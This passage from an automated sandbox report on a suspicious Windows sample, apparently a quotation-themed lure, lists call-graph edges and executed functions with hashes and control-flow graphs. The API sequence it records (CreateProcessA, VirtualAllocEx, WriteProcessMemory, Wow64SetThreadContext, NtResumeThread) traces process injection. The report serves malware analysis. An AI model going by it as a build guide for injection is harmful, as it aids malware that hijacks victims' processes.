Wow64SetThreadContext 58442->58443 58445 598e9e9 58443->58445 58445->58283 58447 598e971 Wow64SetThreadContext 58446->58447 58449 598e9e9 58447->58449 58449->58283 58451 596de8d 58450->58451 58453 598e928 Wow64SetThreadContext 58451->58453 58454 598e921 Wow64SetThreadContext 58451->58454 58452 596dea6 58452->58295 58453->58452 58454->58452 58456 596de78 58455->58456 58458 598e928 Wow64SetThreadContext 58456->58458 58459 598e921 Wow64SetThreadContext 58456->58459 58457 596dea6 58457->58295 58458->58457 58459->58457 58461 596c837 58460->58461 58462 596c859 58461->58462 58468 596cacd 58461->58468 58462->58306 58465 596c837 58464->58465 58466 596c859 58465->58466 58467 596cacd 2 API calls 58465->58467 58466->58306 58467->58466 58472 598e570 58468->58472 58476 598e564 58468->58476 58473 598e5f0 CreateProcessA 58472->58473 58475 598e7ec 58473->58475 58477 598e570 CreateProcessA 58476->58477 58479 598e7ec 58477->58479 58481 596df25 58480->58481 58490 598ee88 58481->58490 58494 598ee81 58481->58494 58482 596df47 58482->58311 58486 596df0a 58485->58486 58488 598ee88 VirtualAllocEx 58486->58488 58489 598ee81 VirtualAllocEx 58486->58489 58487 596df47 58487->58311 58488->58487 58489->58487 58491 598eecc VirtualAllocEx 58490->58491 58493 598ef44 58491->58493 58493->58482 58495 598ee88 VirtualAllocEx 58494->58495 58497 598ef44 58495->58497 58497->58482 58499 598f034 WriteProcessMemory 58498->58499 58501 598f0cd 58499->58501 58501->58320 58503 598efe8 WriteProcessMemory 58502->58503 58505 598f0cd 58503->58505 58505->58320 58507 598f200 NtResumeThread 58506->58507 58509 598f2a0 58507->58509 58509->58392 58511 598f249 NtResumeThread 58510->58511 58513 598f2a0 58511->58513 58513->58392 58515 598f1ba 58514->58515 58516 598f224 NtResumeThread 58514->58516 58515->58392 58518 598f2a0 58516->58518 58518->58392 57996 585e198 57997 585e1a2 57996->57997 58001 5961628 57997->58001 58006 5961638 57997->58006 57998 585e1e0 58002 5961638 58001->58002 58011 59617c6 58002->58011 58016 5961746 58002->58016 58003 5961663 58003->57998 58007 596164d 58006->58007 58009 59617c6 2 API calls 58007->58009 58010 5961746 2 API calls 58007->58010 58008 5961663 58008->57998 58009->58008 58010->58008 58013 59617cc 58011->58013 58012 5961a81 58012->58003 58013->58012 58014 598f4d8 VirtualProtect 58013->58014 58015 598f4d1 VirtualProtect 58013->58015 58014->58013 58015->58013 58018 596176a 58016->58018 58017 5961a81 58017->58003 58018->58017 58019 598f4d8 VirtualProtect 58018->58019 58020 598f4d1 VirtualProtect 58018->58020 58019->58018 58020->58018 58025 585d9cb 58026 585d9d1 58025->58026 58030 5960880 58026->58030 58037 5960870 58026->58037 58027 585dd35 58031 5960895 58030->58031 58044 5960dc6 58031->58044 58049 5960d7c 58031->58049 58054 59608c0 58031->58054 58059 59608b2 58031->58059 58032 59608ab 58032->58027 58038 5960895 58037->58038 58040 5960dc6 2 API calls 58038->58040 58041 59608b2 2 API calls 58038->58041 58042 59608c0 2 API calls 58038->58042 58043 5960d7c 2 API calls 58038->58043 58039 59608ab 58039->58027 58040->58039 58041->58039 58042->58039 58043->58039 58045 5960937 58044->58045 58045->58044 58046 5960d02 58045->58046 58047 598f4d8 VirtualProtect 58045->58047 58048 598f4d1 VirtualProtect 58045->58048 58046->58032 58047->58045 58048->58045 58050 5960937 58049->58050 58051 5960d02 58050->58051 58052 598f4d8 VirtualProtect 58050->58052 58053 598f4d1 VirtualProtect 58050->58053 58051->58032 58052->58050 58053->58050 58055 59608ea 58054->58055 58056 5960d02 58055->58056 58057 598f4d8 VirtualProtect 58055->58057 58058 598f4d1 VirtualProtect 58055->58058 58056->58032 58057->58055 58058->58055 58060 59608c0 58059->58060 58061 5960d02 58060->58061 58062 598f4d8 VirtualProtect 58060->58062 58063 598f4d1 VirtualProtect 58060->58063 58061->58032 58062->58060 58063->58060

                                                          Executed Functions

                                                          Function 05932140 Relevance: 16.2, Strings: 12, Instructions: 1176COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-3443518476
                                                          • Opcode ID: 265188e723dfcc6fdfae6a95876bf4f44aab6a839dc3708dd33cd59b83091400
                                                          • Instruction ID: 246c36c9a1c511b192f6f8deee0b654dac8af32b0bbd469f4d45b75510c5bb5b
                                                          • Opcode Fuzzy Hash: 265188e723dfcc6fdfae6a95876bf4f44aab6a839dc3708dd33cd59b83091400
                                                          • Instruction Fuzzy Hash: 8AB2F638A00218DFDB14DFA8C995BADB7B6FF48700F158599E506AB2A5DB70EC81CF50
                                                          Function 05932467 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-324474496
                                                          • Opcode ID: 13fda0c895fd9db221f67c6a50e266653be272cc028d5fb86574fdf4c1a9e3a7
                                                          • Instruction ID: 762dd4ce2e2320c5d29a0eff0a54f322a55bc5dee489e8d007e3914555661321
                                                          • Opcode Fuzzy Hash: 13fda0c895fd9db221f67c6a50e266653be272cc028d5fb86574fdf4c1a9e3a7
                                                          • Instruction Fuzzy Hash: 4422FB38A00219CFDB24DFA4C995BADB7B6FF48304F148599E509AB2A5DB70ED81CF50
                                                          Function 0079A9C0 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 638 79a9c0-79a9e1 639 79a9e8-79aacf 638->639 640 79a9e3 638->640 642 79b1d1-79b1f9 639->642 643 79aad5-79ac16 call 796da0 639->643 640->639 646 79b8ff-79b908 642->646 689 79b19a-79b1c4 643->689 690 79ac1c-79ac77 643->690 648 79b90e-79b925 646->648 649 79b207-79b211 646->649 650 79b218-79b30c call 796da0 649->650 651 79b213 649->651 672 79b30e-79b31a 650->672 673 79b336 650->673 651->650 675 79b31c-79b322 672->675 676 79b324-79b32a 672->676 674 79b33c-79b35c 673->674 680 79b3bc-79b43c 674->680 681 79b35e-79b3b7 674->681 678 79b334 675->678 676->678 678->674 701 79b43e-79b491 680->701 702 79b493-79b4d6 call 796da0 680->702 693 79b8fc 681->693 703 79b1ce 689->703 704 79b1c6 689->704 696 79ac79 690->696 697 79ac7c-79ac87 690->697 693->646 696->697 700 79b0af-79b0b5 697->700 705 79b0bb-79b137 call 790e74 700->705 706 79ac8c-79acaa 700->706 727 79b4e1-79b4ea 701->727 702->727 703->642 704->703 746 79b184-79b18a 705->746 708 79acac-79acb0 706->708 709 79ad01-79ad16 706->709 708->709 712 79acb2-79acbd 708->712 714 79ad18 709->714 715 79ad1d-79ad33 709->715 718 79acf3-79acf9 712->718 714->715 716 79ad3a-79ad51 715->716 717 79ad35 715->717 722 79ad58-79ad6e 716->722 723 79ad53 716->723 717->716 724 79acfb-79acfc 718->724 725 79acbf-79acc3 718->725 730 79ad70 722->730 731 79ad75-79ad7c 722->731 723->722 733 79ad7f-79adea 724->733 728 79acc9-79ace1 725->728 729 79acc5 725->729 734 79b54a-79b559 727->734 735 79ace8-79acf0 728->735 736 79ace3 728->736 729->728 730->731 731->733 737 79adec-79adf8 733->737 738 79adfe-79afb3 733->738 740 79b55b-79b5e3 734->740 741 79b4ec-79b514 734->741 735->718 736->735 737->738 748 79afb5-79afb9 738->748 749 79b017-79b02c 738->749 776 79b75c-79b768 740->776 743 79b51b-79b544 741->743 744 79b516 741->744 743->734 744->743 752 79b139-79b181 746->752 753 79b18c-79b192 746->753 748->749 750 79afbb-79afca 748->750 754 79b02e 749->754 755 79b033-79b054 749->755 756 79b009-79b00f 750->756 752->746 753->689 754->755 757 79b05b-79b07a 755->757 758 79b056 755->758 763 79afcc-79afd0 756->763 764 79b011-79b012 756->764 760 79b07c 757->760 761 79b081-79b0a1 757->761 758->757 760->761 769 79b0a8 761->769 770 79b0a3 761->770 767 79afda-79affb 763->767 768 79afd2-79afd6 763->768 771 79b0ac 764->771 772 79affd 767->772 773 79b002-79b006 767->773 768->767 769->771 770->769 771->700 772->773 773->756 778 79b5e8-79b5f1 776->778 779 79b76e-79b7c9 776->779 780 79b5fa-79b750 778->780 781 79b5f3 778->781 794 79b7cb-79b7fe 779->794 795 79b800-79b82a 779->795 799 79b756 780->799 781->780 783 79b68a-79b6ca 781->783 784 79b6cf-79b70f 781->784 785 79b600-79b640 781->785 786 79b645-79b685 781->786 783->799 784->799 785->799 786->799 803 79b833-79b8c6 794->803 795->803 799->776 807 79b8cd-79b8ed 803->807 807->693
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RZW+$TJbq$Te]q$paq$xb`q
                                                          • API String ID: 0-4120908068
                                                          • Opcode ID: d42f3749fecb464088d6254efdcc18affc60c680c864d8ba14d80b9d0dd8ae8d
                                                          • Instruction ID: aa30652f1e1cc71832141e5889fab953c5c36d826780fee4b4de806ca8dad755
                                                          • Opcode Fuzzy Hash: d42f3749fecb464088d6254efdcc18affc60c680c864d8ba14d80b9d0dd8ae8d
                                                          • Instruction Fuzzy Hash: CCA2B775A00228CFDB65CF69D984A99BBB2FF89304F1581E9D50DAB325DB319E81CF40
                                                          Function 0598AA98 Relevance: 4.3, Strings: 3, Instructions: 544COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 809 598aa98-598aab9 810 598aabb 809->810 811 598aac0-598ab58 call 598b3d1 809->811 810->811 815 598ab5e-598ab95 811->815 817 598aba4 815->817 818 598ab97-598aba2 815->818 819 598abae-598ac80 817->819 818->819 828 598ac92-598acbd 819->828 829 598ac82-598ac88 819->829 830 598b332-598b34e 828->830 829->828 831 598acc2-598adeb 830->831 832 598b354-598b36f 830->832 841 598adfd-598af54 831->841 842 598aded-598adf3 831->842 850 598afad-598afb4 841->850 851 598af56-598af5a 841->851 842->841 854 598b15f-598b17b 850->854 852 598af5c-598af5d 851->852 853 598af62-598afa8 851->853 857 598b1ef-598b23e 852->857 853->857 855 598afb9-598b0a7 854->855 856 598b181-598b1a5 854->856 881 598b15b-598b15c 855->881 882 598b0ad-598b158 855->882 862 598b1ec-598b1ed 856->862 863 598b1a7-598b1e9 856->863 870 598b250-598b29b 857->870 871 598b240-598b246 857->871 862->857 863->862 874 598b29d-598b313 870->874 875 598b314-598b32f 870->875 871->870 874->875 875->830 881->854 882->881
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$8$U-wA
                                                          • API String ID: 0-1777653695
                                                          • Opcode ID: b9ddf822385f9a508ba6157c9bb96275d139953a09628ea8873fb0032805bcd6
                                                          • Instruction ID: e698eb8c58e5ccbb6d040c6fb6621cc3fcab229f2a5f827d4d3b12fab57d4b5a
                                                          • Opcode Fuzzy Hash: b9ddf822385f9a508ba6157c9bb96275d139953a09628ea8873fb0032805bcd6
                                                          • Instruction Fuzzy Hash: 7C42C375D00629CBDB64DF69C850AD9B7B2BF89314F1486EAD44DA7251EB30AE81CF40
                                                          Function 05935750 Relevance: 3.1, Strings: 2, Instructions: 639COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1268 5935750-593576a 1269 5935776-5935782 1268->1269 1270 593576c-5935773 1268->1270 1272 5935784-5935791 1269->1272 1273 59357de-59357e1 1269->1273 1280 5935797-59357c7 1272->1280 1281 59359af-59359e7 1272->1281 1274 59357e3-59357e5 1273->1274 1275 59357f4-59357f7 1273->1275 1279 59357ed 1274->1279 1277 59357f9-5935817 1275->1277 1278 593581d-5935820 1275->1278 1277->1278 1287 59359ee-5935a39 1277->1287 1282 5935826-593582c 1278->1282 1283 59359a5-59359ac 1278->1283 1279->1275 1309 59357d4-59357d7 1280->1309 1310 59357c9-59357d2 1280->1310 1281->1287 1282->1283 1284 5935832-593583b 1282->1284 1291 5935873-5935879 1284->1291 1292 593583d-593584c 1284->1292 1316 5935a72-5935a74 1287->1316 1317 5935a3b-5935a48 1287->1317 1295 5935984-593598a 1291->1295 1296 593587f-5935888 1291->1296 1292->1291 1302 593584e-5935867 1292->1302 1295->1283 1299 593598c-593599c 1295->1299 1296->1295 1308 593588e-593589a 1296->1308 1299->1283 1312 593599e-59359a3 1299->1312 1302->1291 1314 5935869-593586c 1302->1314 1318 59358a0-59358c8 1308->1318 1319 5935938-593597c 1308->1319 1309->1273 1310->1273 1312->1283 1314->1291 1320 5935ebf-5935ec6 1316->1320 1317->1316 1324 5935a4a-5935a70 1317->1324 1318->1319 1331 59358ca-5935907 1318->1331 1319->1295 1324->1316 1336 5935a79-5935aad 1324->1336 1331->1319 1343 5935909-5935936 1331->1343 1344 5935ab3-5935abc 1336->1344 1345 5935b50-5935b5f 1336->1345 1343->1295 1346 5935ac2-5935ad5 1344->1346 1347 5935ec7-5935ed3 1344->1347 1353 5935b61-5935b77 1345->1353 1354 5935b9e 1345->1354 1356 5935ad7-5935af0 1346->1356 1357 5935b3e-5935b4a 1346->1357 1362 5935b97-5935b9c 1353->1362 1363 5935b79-5935b95 1353->1363 1355 5935ba0-5935ba5 1354->1355 1358 5935ba7-5935bc8 1355->1358 1359 5935be8-5935c04 1355->1359 1356->1357 1376 5935af2-5935b00 1356->1376 1357->1344 1357->1345 1358->1359 1380 5935bca 1358->1380 1368 5935c0a-5935c13 1359->1368 1369 5935ccc-5935cd5 1359->1369 1362->1355 1363->1355 1368->1347 1374 5935c19-5935c36 1368->1374 1372 5935cdb 1369->1372 1373 5935ebd 1369->1373 1377 5935ce2-5935ce4 1372->1377 1378 5935d46-5935d54 call 5933170 1372->1378 1379 5935ce9-5935cf7 call 5933170 1372->1379 1373->1320 1400 5935cba-5935cc6 1374->1400 1401 5935c3c-5935c52 1374->1401 1376->1357 1388 5935b02-5935b06 1376->1388 1377->1320 1391 5935d56-5935d5c 1378->1391 1392 5935d6c-5935d6f 1378->1392 1389 5935cf9-5935cff 1379->1389 1390 5935d0f-5935d12 1379->1390 1384 5935bcd-5935be6 1380->1384 1384->1359 1388->1347 1395 5935b0c-5935b25 1388->1395 1396 5935d03-5935d05 1389->1396 1397 5935d01 1389->1397 1402 5935d14-5935d16 1390->1402 1403 5935d1b-5935d29 call 5933170 1390->1403 1398 5935d60-5935d62 1391->1398 1399 5935d5e 1391->1399 1404 5935e00-5935e11 call 5933170 1392->1404 1405 5935d75-5935d83 call 5933170 1392->1405 1395->1357 1425 5935b27-5935b3b call 5931fa0 1395->1425 1396->1390 1397->1390 1398->1392 1399->1392 1400->1368 1400->1369 1401->1400 1433 5935c54-5935c62 1401->1433 1402->1320 1417 5935d41 1403->1417 1418 5935d2b-5935d31 1403->1418 1415 5935e13-5935e19 1404->1415 1416 5935e29-5935e2c 1404->1416 1419 5935d85-5935d8b 1405->1419 1420 5935d9b-5935dae call 5933170 1405->1420 1427 5935e1b 1415->1427 1428 5935e1d-5935e1f 1415->1428 1416->1373 1430 5935e32-5935e43 call 5933170 1416->1430 1417->1320 1421 5935d33 1418->1421 1422 5935d35-5935d37 1418->1422 1423 5935d8f-5935d91 1419->1423 1424 5935d8d 1419->1424 1436 5935db0-5935db6 1420->1436 1437 5935dc6-5935dd3 1420->1437 1421->1417 1422->1417 1423->1420 1424->1420 1425->1357 1427->1416 1428->1416 1439 5935e45-5935e4b 1430->1439 1440 5935e5b-5935e6b call 5933170 1430->1440 1433->1400 1444 5935c64-5935c68 1433->1444 1441 5935dba-5935dbc 1436->1441 1442 5935db8 1436->1442 1437->1404 1452 5935dd5-5935de3 call 5933170 1437->1452 1445 5935e4f-5935e51 1439->1445 1446 5935e4d 1439->1446 1453 5935e83-5935e90 1440->1453 1454 5935e6d-5935e73 1440->1454 1441->1437 1442->1437 1444->1347 1450 5935c6e-5935c97 1444->1450 1445->1440 1446->1440 1450->1400 1472 5935c99-5935cb7 call 5931fa0 1450->1472 1460 5935de5-5935deb 1452->1460 1461 5935dfb 1452->1461 1453->1373 1466 5935e92-5935ea3 call 5933170 1453->1466 1457 5935e77-5935e79 1454->1457 1458 5935e75 1454->1458 1457->1453 1458->1453 1463 5935def-5935df1 1460->1463 1464 5935ded 1460->1464 1461->1320 1463->1461 1464->1461 1470 5935ea5-5935eab 1466->1470 1471 5935ebb 1466->1471 1473 5935eaf-5935eb1 1470->1473 1474 5935ead 1470->1474 1471->1320 1472->1400 1473->1471 1474->1471
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pl]q$$]q
                                                          • API String ID: 0-2369359564
                                                          • Opcode ID: d078e26f2d11c45386fa89875ce3e9ddbc8732afdf11dd74dfaa4a6c78945cac
                                                          • Instruction ID: f593cb29b0eb47ead41e9c9ab5aea5e5f3d6562efbb9033256fc4227f1c6c047
                                                          • Opcode Fuzzy Hash: d078e26f2d11c45386fa89875ce3e9ddbc8732afdf11dd74dfaa4a6c78945cac
                                                          • Instruction Fuzzy Hash: 03324734B40209CFCB28DF69C589A6A77FAFF89710B1684A9D406CB365DB35EC41CB61
                                                          Function 0598AA88 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2451 598aa88-598aab9 2453 598aabb 2451->2453 2454 598aac0-598ab58 call 598b3d1 2451->2454 2453->2454 2458 598ab5e-598ab95 2454->2458 2460 598aba4 2458->2460 2461 598ab97-598aba2 2458->2461 2462 598abae-598ac80 2460->2462 2461->2462 2471 598ac92-598acbd 2462->2471 2472 598ac82-598ac88 2462->2472 2473 598b332-598b34e 2471->2473 2472->2471 2474 598acc2-598adeb 2473->2474 2475 598b354-598b36f 2473->2475 2484 598adfd-598af54 2474->2484 2485 598aded-598adf3 2474->2485 2493 598afad-598afb4 2484->2493 2494 598af56-598af5a 2484->2494 2485->2484 2497 598b15f-598b17b 2493->2497 2495 598af5c-598af5d 2494->2495 2496 598af62-598afa8 2494->2496 2500 598b1ef-598b23e 2495->2500 2496->2500 2498 598afb9-598b0a7 2497->2498 2499 598b181-598b1a5 2497->2499 2524 598b15b-598b15c 2498->2524 2525 598b0ad-598b158 2498->2525 2505 598b1ec-598b1ed 2499->2505 2506 598b1a7-598b1e9 2499->2506 2513 598b250-598b29b 2500->2513 2514 598b240-598b246 2500->2514 2505->2500 2506->2505 2517 598b29d-598b313 2513->2517 2518 598b314-598b32f 2513->2518 2514->2513 2517->2518 2518->2473 2524->2497 2525->2524
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$h
                                                          • API String ID: 0-3598783323
                                                          • Opcode ID: edcf4bcaf11388a66725ef3dec22dd5359b82e36a559fb7c4a79486f5969cfa5
                                                          • Instruction ID: 07214b438ce047618cc3584796f4033fc15ca2efede63fe2c285685598a87601
                                                          • Opcode Fuzzy Hash: edcf4bcaf11388a66725ef3dec22dd5359b82e36a559fb7c4a79486f5969cfa5
                                                          • Instruction Fuzzy Hash: EC61C371D006298BEB64DF6ACC40BD9BBB6FF89310F14C6AAD40DA7250EB305A85CF51
                                                          Function 05982198 Relevance: 2.0, Strings: 1, Instructions: 793COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 037297907759e2293f54243399ddd74b56959188b638ab2d94c1acb3755aa3c5
                                                          • Instruction ID: 6c32e6258993ea6fe9d1343a443f5d32cb11b6de1a4102f37e6f85df74b905a8
                                                          • Opcode Fuzzy Hash: 037297907759e2293f54243399ddd74b56959188b638ab2d94c1acb3755aa3c5
                                                          • Instruction Fuzzy Hash: 21629974A006158FCB58EFA9C494A7EFBF2FF88300F14856AE55AD7391DB34A905CB90
                                                          Function 0585EAF0 Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: ec3280b6a1f524844319c4f54126879776b61d85439f1ae0bd9eb46f21cbdca4
                                                          • Instruction ID: 631617eef39396c178d0e3585f615364cd31c876c187ebd0d50321bc4617f207
                                                          • Opcode Fuzzy Hash: ec3280b6a1f524844319c4f54126879776b61d85439f1ae0bd9eb46f21cbdca4
                                                          • Instruction Fuzzy Hash: 47F1E174A45218CFDB24CF69C884BA9BBF6BB49314F1081E9E90EE7255DB709E85CF01
                                                          Function 0598DCC0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0598DD7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: bd5baecdf6f02c708a631f12ab65dd3828474e63895c6ce2d63be47c44651b95
                                                          • Instruction ID: 722fbabcdb94ade76fc6f76dd38c3808b2bc87726802daa2e7fc80f88b5ed57f
                                                          • Opcode Fuzzy Hash: bd5baecdf6f02c708a631f12ab65dd3828474e63895c6ce2d63be47c44651b95
                                                          • Instruction Fuzzy Hash: B4418AB4D002589FCF10DFAAD984AEEFBB5FB49310F10942AE819B7250D735A945CFA4
                                                          Function 0598DCC8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0598DD7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 99eb112d4d2831a0c3d925fc54bbbca870970670bc70f3c05fe1857f7b30475e
                                                          • Instruction ID: 404058b0d4db57ce2743795ae6f1211c4e9ebc66a69fb9fcdb02d8311628a01d
                                                          • Opcode Fuzzy Hash: 99eb112d4d2831a0c3d925fc54bbbca870970670bc70f3c05fe1857f7b30475e
                                                          • Instruction Fuzzy Hash: 814179B8D042589FCF10DFAAD980AEEFBB5BF49310F10942AE819B7250D735A945CF64
                                                          Function 0598F1AF Relevance: 1.6, APIs: 1, Instructions: 93nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 36cd28a59dd703600115337b64c7b649de2972c6494754804043325e3d6026be
                                                          • Instruction ID: 55b91c5809547f4d1db95bc697145c10dbb37e7fa36d53ae37ac11104e0b72f7
                                                          • Opcode Fuzzy Hash: 36cd28a59dd703600115337b64c7b649de2972c6494754804043325e3d6026be
                                                          • Instruction Fuzzy Hash: 2F3114B9D052089FDB10EFA8E844AEEFBF1FF4A310F14902AE419B7251C735A845CB64
                                                          Function 0598F1F9 Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 90dfbd93e537e9ab08627f6c731c31e01f0bd6565cfdd5be1d3878d122e09ad1
                                                          • Instruction ID: 74fee1ecc3a1769078aaa5fbf187e78fb3b2b84b501b74548bcae04af7902a1e
                                                          • Opcode Fuzzy Hash: 90dfbd93e537e9ab08627f6c731c31e01f0bd6565cfdd5be1d3878d122e09ad1
                                                          • Instruction Fuzzy Hash: CE319AB8D012189FCB10DFA9D984AEEFBF5FB49310F10942AE819B7200D775A945CF94
                                                          Function 0598F200 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: bc62ffb371f571631f39a77979cda0d8d78c2954333c9257c92475886e73ae17
                                                          • Instruction ID: 311ba3b1c7c0327d0ad817155e75dd1ba35553a6171e44e1cdb2e043b0c6843e
                                                          • Opcode Fuzzy Hash: bc62ffb371f571631f39a77979cda0d8d78c2954333c9257c92475886e73ae17
                                                          • Instruction Fuzzy Hash: 02318BB8D012189FCB10DFA9D984AEEFBF5FB49310F10942AE815B7200C775A945CF94
                                                          Function 05C8DE50 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ddq
                                                          • API String ID: 0-562783569
                                                          • Opcode ID: 220c6ae343145e6f0e1275932e759ed70cf788435245fc7bfa629acf9693ede1
                                                          • Instruction ID: e6c0c29835711f78524c98da33444b5fb189bbbd4d0816e51871d451c8fda289
                                                          • Opcode Fuzzy Hash: 220c6ae343145e6f0e1275932e759ed70cf788435245fc7bfa629acf9693ede1
                                                          • Instruction Fuzzy Hash: 94D1CF74A01218CFDB54EFA9D984A9DBBF2FF89304F1085A9D409AB365DB31AD81CF50
                                                          Function 05988A88 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
